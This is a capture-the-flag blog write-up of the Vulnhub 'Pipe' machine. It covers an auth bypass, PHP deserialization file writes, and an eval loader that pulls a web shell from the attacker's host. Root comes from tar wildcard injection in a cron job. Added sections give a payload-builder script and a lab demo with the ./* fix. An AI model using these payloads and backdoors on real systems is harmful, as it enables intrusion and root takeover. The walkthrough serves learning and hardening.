Mr_H4sh

Infosec, CTF and more

Pipe Solution

Hi guys, it’s been a while :)

Today I’m going to show you how I’ve completed the CTF called Pipe from Vulnhub.

Thanks to sagi- for the challenge.

First step: INFORMATION GATHERING

The description provided on Vulnhub said that the machine will have an IP assigned automatically. So, I ran the following command to discover the IP address of the victim machine:

fping -a -g 192.168.56.1/24 > alive_hosts.txt

# cat alive_hosts.txt

192.168.56.101 <== victim
192.168.56.103 <== attacker

After discovering that the victim's IP address was 192.168.56.101, I ran a full TCP port scan to see what was listening:

nmap -sT -p- -Pn -T5 192.168.56.101 > nmap_scan.txt

# cat nmap_scan.txt 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-10-10 13:48 BST
Nmap scan report for 192.168.56.101
Host is up (0.0015s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
51459/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 43.91 seconds

Looks good. The open ports look very interesting.

Second step: VULNERABILITY SCAN

When I opened http://192.168.56.101:80 I was stopped by a login prompt: [screenshot: the index page behind a login prompt]

Uh oh… what about now? Time to scan.

Third step: WEB VULNERABILITY SCAN

Since I was blocked by a server-side login page, I ran DirBuster to look for interesting directories and files:

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Oct 12 22:41:55 BST 2015
--------------------------------

http://192.168.56.101:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/images/
/scriptz/

Dirs found with a 403 response:

/server-status/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/scriptz/log.php.BAK
/scriptz/php.js


--------------------------------

I love this tool! Even if I think this was pure luck. But the important thing is to reach the goal one way or another, right? ;)

I had a look at /scriptz/log.php.BAK: it turned out to be a class for logging. Nothing interesting. Same for /scriptz/php.js, nothing that gave me a way past the login page.

Then I started playing with cURL, sending some requests, and this gave me something interesting:

# curl -X POST -d 'bar=foo' 192.168.56.101/index.php

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script src="scriptz/php.js"></script>
<script>
function submit_form() {
var object = serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'}); 
object = object.substr(object.indexOf("{"),object.length);
object = "O:4:\"Info\":4:" + object;
document.forms[0].param.value = object;
document.getElementById('info_form').submit();
}
</script> 
<title>The Treachery of Images</title>
</head>
<h1><i>The Treachery of Images</i></h1>
<hr />
From Wikipedia, the free encyclopedia
<br />
<br />
The Treachery of Images (French: La trahison des images, 1928–29, sometimes translated as The Treason of Images) is a painting by the Belgian surrealist painter René Magritte, painted when Magritte was 30 years old. The picture shows a pipe. Below it, Magritte painted, "Ceci n'est pas une pipe." [sə.si ne paz‿yn pip], French for "This is not a pipe."
<p>
"The famous pipe. How people reproached me for it! And yet, could you stuff my pipe? No, it's just a representation, is it not? So if I had written on my picture 'This is a pipe', I'd have been lying!"
</p>
His statement is taken to mean that the painting itself is not a pipe. The painting is merely an image of a pipe. Hence, the description, "this is not a pipe." The theme of pipes with the text "Ceci n'est pas une pipe" is extended in his 1966 painting, Les Deux Mystères. It is currently on display at the Los Angeles County Museum of Art.
The painting is sometimes given as an example of meta message conveyed by paralanguage. Compare with Korzybski's "The word is not the thing" and "The map is not the territory".
<br />
<br />
<center><div style="width:500px;overflow:hidden;" >
   <img src="images/pipe.jpg" width="400px" height="auto" border="1">
</div>
<form action="index.php" id="info_form" method="POST">
   <input type="hidden" name="param" value="" />
   <a href="#" onclick="submit_form(); return false;">Show Artist Info.</a>
</form></center></html>

NICE! A plain POST came back with the page, with no login prompt in the way: whatever protected the site only covered the GET my browser had sent. (A common cause is an Apache <Limit GET> block wrapped around the authentication directives, which leaves every other method unauthenticated; worth remembering whenever a login page shows up only on GET.) So I used Live HTTP Headers to replay the same POST from Iceweasel (or Firefox), and this is what I found: [screenshot: the index page loaded via POST]

I had another look at the code. The "Show Artist Info." link calls a function named submit_form, and the form carries a hidden input named param. submit_form builds a PHP-serialized Info object (O:4:"Info":4:{...}) entirely on the client, drops it into param and POSTs the form to index.php. A serialized object built client side and trusted by the server was "great" (for me): index.php has to be feeding param to unserialize(), and unserialize() will instantiate whatever class the string names, with whatever property values I choose, and run that class's magic methods (__wakeup(), __destruct() and friends) on my data.

Do you remember when I said there was nothing interesting in /scriptz/log.php.BAK? Well… code is golden! The backup file showed that the Log class takes a filename and some data, and writes the data to that file. So I swapped Info for Log in the payload, made some tests and got lucky with this (every s:N: must be the exact byte length of the string that follows, or unserialize() rejects the whole thing):

param=O:3:"Log":2:{s:8:"filename";s:33:"/var/www/html/scriptz/phpinfo.php";s:4:"data";s:21:"<?php echo phpinfo();";}

And this is what I found: [screenshot: phpinfo() output served from /scriptz/phpinfo.php]

Fourth step: EXPLOITATION

Being able to write files as the web server user is enough for code execution, so I used the same primitive to drop a small loader that fetches PHP code from a URL and eval()s it:

param=O:3:"Log":2:{s:8:"filename";s:35:"/var/www/html/scriptz/backdoor6.php";s:4:"data";s:117:"<?php error_reporting(E_ALL); ini_set('display_errors', 1); $file = file_get_contents($_GET['file']); eval($file); ?>";}

Then this URL made the loader pull my web shell from the attacker machine and run it (file_get_contents() only accepts http:// URLs when allow_url_fopen is on, which is worth checking in the phpinfo() output before relying on it): http://192.168.56.101/scriptz/backdoor6.php?file=http://192.168.56.103/test_shell/shell.txt

[screenshot: the web shell]

Sweet, shell uploaded successfully, time to find something interesting.
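The two payloads above were built by hand, and the one thing that breaks them is a wrong s:N: byte count. This added example (mine, not code from the original post) builds the serialized Log object for any filename/data pair with the lengths computed, and hands it to curl with --data-urlencode so the quotes, braces and "<?php" survive the POST. It assumes the class and property names seen in log.php.BAK (Log, filename, data) and the target URL from this walkthrough.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough.
# Builds the PHP-serialized Log object with computed byte lengths and
# delivers it exactly the way the form does: POST index.php, field "param".
# Assumptions: class "Log" with public properties "filename" and "data"
# (as seen in log.php.BAK); target http://192.168.56.101/index.php.

# Byte length of a string. wc -c pads with spaces on some systems, so strip them.
bytelen() { printf '%s' "$1" | wc -c | tr -d ' '; }

# PHP serialization of a string: s:<bytes>:"<raw bytes>";
php_str() { printf 's:%s:"%s";' "$(bytelen "$1")" "$1"; }

# Serialized Log object with two properties: filename (where to write) and
# data (what to write). O:3:"Log":2:{...} = class name of 3 bytes, 2 props.
log_payload() {
    printf 'O:3:"Log":2:{%s%s%s%s}' \
        "$(php_str filename)" "$(php_str "$1")" \
        "$(php_str data)" "$(php_str "$2")"
}

# Send it. --data-urlencode does the percent-encoding of the whole value,
# so braces, quotes, semicolons and "<?php" reach the server intact.
deliver() {
    curl -s -X POST "http://192.168.56.101/index.php" \
        --data-urlencode "param=$(log_payload "$1" "$2")"
}

# Stage 1 from the walkthrough: a phpinfo() page. Print the payload so the
# byte counts can be eyeballed before it is sent.
log_payload /var/www/html/scriptz/phpinfo.php '<?php echo phpinfo();'
echo

# Stage 2: the loader, fetched by the browser afterwards with ?file=<url>.
# Uncomment to actually fire it at the target:
# deliver /var/www/html/scriptz/backdoor6.php \
#   "<?php error_reporting(E_ALL); ini_set('display_errors', 1); \$file = file_get_contents(\$_GET['file']); eval(\$file); ?>"
```

Run it on the attacker box; the printed payload should match the one used above byte for byte. Swapping the data string for anything else (a different loader, a one-line shell) needs no recounting, which is the point.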

I found the .htpasswd file with the following content ($apr1$ is Apache's MD5-based crypt, hashcat mode 1600), but I couldn't crack the password:

rene:$apr1$wfYjXf4U$0ZZ.qhGGrtkOxvKr5WFqX/

I wandered around a bit more (passwd, shadow, rc.local), and finally I found something interesting in /etc/crontab:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh

What stood out at a glance? A script in /usr/bin run by root every five minutes, /usr/bin/compress.sh, and this was its content:

#!/bin/sh

rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK

I spent a bit of time on it and found out that tar allows arbitrary command execution, as I read here, at point 4.3. The trick is the unquoted * in "tar cfz /home/rene/backup/backup.tar.gz *": the shell expands it into the names of the files in /home/rene/backup, and GNU tar treats any argument starting with -- as an option no matter where it sits on the command line. Two files named --checkpoint=1 and --checkpoint-action=exec=... therefore make tar run a command of my choosing at its first checkpoint. This only works because my shell could create files in /home/rene/backup.

The idea was to have root execute a command for me the next time the cron job fired.

So I set it up, from inside /home/rene/backup since that is where the script cd's before running tar:

cd /home/rene/backup
echo "cp /root/flag.txt /tmp/flag.txt; chmod a+r /tmp/flag.txt" > exploit.sh
touch /home/rene/backup/--checkpoint=1
touch /home/rene/backup/--checkpoint-action=exec=sh\ exploit.sh
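Before planting those files on the target, it is worth watching the trick fire somewhere harmless. This added example (mine, not part of the original post) rebuilds the scenario in a temporary directory as an unprivileged user: it drops the same three files, runs the exact tar line from compress.sh and reports whether exploit.sh was executed, then runs the same backup with the wildcard written as ./* to show that the fix is a two-character change. It assumes GNU tar, since --checkpoint-action is a GNU extension that bsdtar does not implement.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough.
# Reproduces the tar wildcard injection from compress.sh in a scratch
# directory, without root and without touching /home/rene/backup.
# Assumes GNU tar (--checkpoint / --checkpoint-action are GNU-only).

has_gnu_tar() { tar --version 2>/dev/null | grep -q 'GNU tar'; }

# Seed a fresh temp dir with the three files from the walkthrough (plus a
# decoy so the archive is not empty) and run the backup line in one of two
# forms: "vulnerable" (the exact command from compress.sh) or "hardened"
# (wildcard anchored with ./). exploit.sh only creates a marker file here.
# Returns 0 if exploit.sh was executed, 1 if it was not, 2 on setup error.
backup_runs_exploit() {
    mode=$1
    work=$(mktemp -d) || return 2
    marker="$work/pwned"
    bdir="$work/backup"
    mkdir "$bdir" || return 2

    printf 'touch "%s"\n' "$marker" > "$bdir/exploit.sh"
    touch "$bdir/decoy.txt"
    touch "$bdir/--checkpoint=1"
    touch "$bdir/--checkpoint-action=exec=sh exploit.sh"

    (
        cd "$bdir" || exit 2
        case $mode in
            vulnerable)
                # What compress.sh does. The shell expands * into
                # "--checkpoint-action=exec=sh exploit.sh" "--checkpoint=1"
                # decoy.txt exploit.sh, and GNU tar parses the first two as
                # options wherever they land on the command line.
                tar cfz "$work/backup.tar.gz" * ;;
            hardened)
                # ./* makes every expanded name start with "./", so tar
                # never sees a leading dash. "-- *" would also work.
                tar cfz "$work/backup.tar.gz" ./* ;;
            *) exit 2 ;;
        esac
    ) >/dev/null 2>&1

    if [ -e "$marker" ]; then rc=0; else rc=1; fi
    rm -rf "$work"
    return $rc
}

if has_gnu_tar; then
    backup_runs_exploit vulnerable && echo 'tar cfz backup.tar.gz *   : exploit.sh ran'
    backup_runs_exploit hardened  || echo 'tar cfz backup.tar.gz ./* : exploit.sh did not run'
else
    echo 'GNU tar not found; --checkpoint-action is not available here'
fi
```

The same property that makes the cron job exploitable (tar reading options out of file names) is exactly what ./* or a -- separator removes, which is the fix to suggest in a report alongside "do not run a writable directory's backup as root".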

And after a minute…

ls -l /tmp
-rw-r--r-- 1 root root 4251 Oct 16 07:35 flag.txt

cat /tmp/flag.txt
                                                                   .aMMMMMMMMn.  ,aMMMMn.
                                                                 .aMccccccccc*YMMn.    `Mb
                                                                aMccccccccccccccc*Mn    MP
                                                               .AMMMMn.   MM `*YMMY*ccaM*
                                                              dM*  *YMMb  YP        `cMY
                                                              YM.  .dMMP   aMn.     .cMP
                                                               *YMMn.     aMMMMMMMMMMMY'
                                                                .'YMMb.           ccMP
                                                             .dMcccccc*Mc....cMb.cMP'
                                                           .dMMMMb;cccc*Mbcccc,IMMMMMMMn.
                                                          dY*'  '*M;ccccMM..dMMM..MP*cc*Mb
                                                          YM.    ,MbccMMMMMMMMMMMM*cccc;MP
                                                           *Mbn;adMMMMMMMMMMMMMMMIcccc;M*
                                                          dPcccccIMMMMMMMMMMMMMMMMa;c;MP
                                                          Yb;cc;dMMMMMMMMMMMP*'  *YMMP*
                                                           *YMMMPYMMMMMMP*'          curchack
                                                       +####################################+
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       |======                            | |
                                                       +----------------------------------+-+
                                                        ####################################
                                                             |======                  |
                                                             |======                  |
                                                             |=====                   |
                                                             |====                    |
                                                             |                        |
                                                             +                        +

 .d8888b.                 d8b          d8b               888                                                                    d8b
d88P  Y88b                Y8P          88P               888                                                                    Y8P
888    888                             8P                888
888        .d88b.  .d8888b888   88888b."  .d88b. .d8888b 888888   88888b.  8888b. .d8888b    888  88888888b.  .d88b.    88888b. 88888888b.  .d88b.
888       d8P  Y8bd88P"   888   888 "88b d8P  Y8b88K     888      888 "88b    "88b88K        888  888888 "88bd8P  Y8b   888 "88b888888 "88bd8P  Y8b
888    88888888888888     888   888  888 88888888"Y8888b.888      888  888.d888888"Y8888b.   888  888888  88888888888   888  888888888  88888888888
Y88b  d88PY8b.    Y88b.   888   888  888 Y8b.         X88Y88b.    888 d88P888  888     X88   Y88b 888888  888Y8b.       888 d88P888888 d88PY8b.   d8b
 "Y8888P"  "Y8888  "Y8888P888   888  888  "Y8888  88888P' "Y888   88888P" "Y888888 88888P'    "Y88888888  888 "Y8888    88888P" 88888888P"  "Y8888Y8P
                                                                  888                                                   888        888
                                                                  888                                                   888        888
                                                                  888                                                   888        888
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7

Conclusion

Nice, I’ve enjoyed it. The good thing is that at every challenge you’ll learn something new.

Thank you to sagi- for the effort.

As usual, for any information or feedback, please do not hesitate to leave a comment.

./A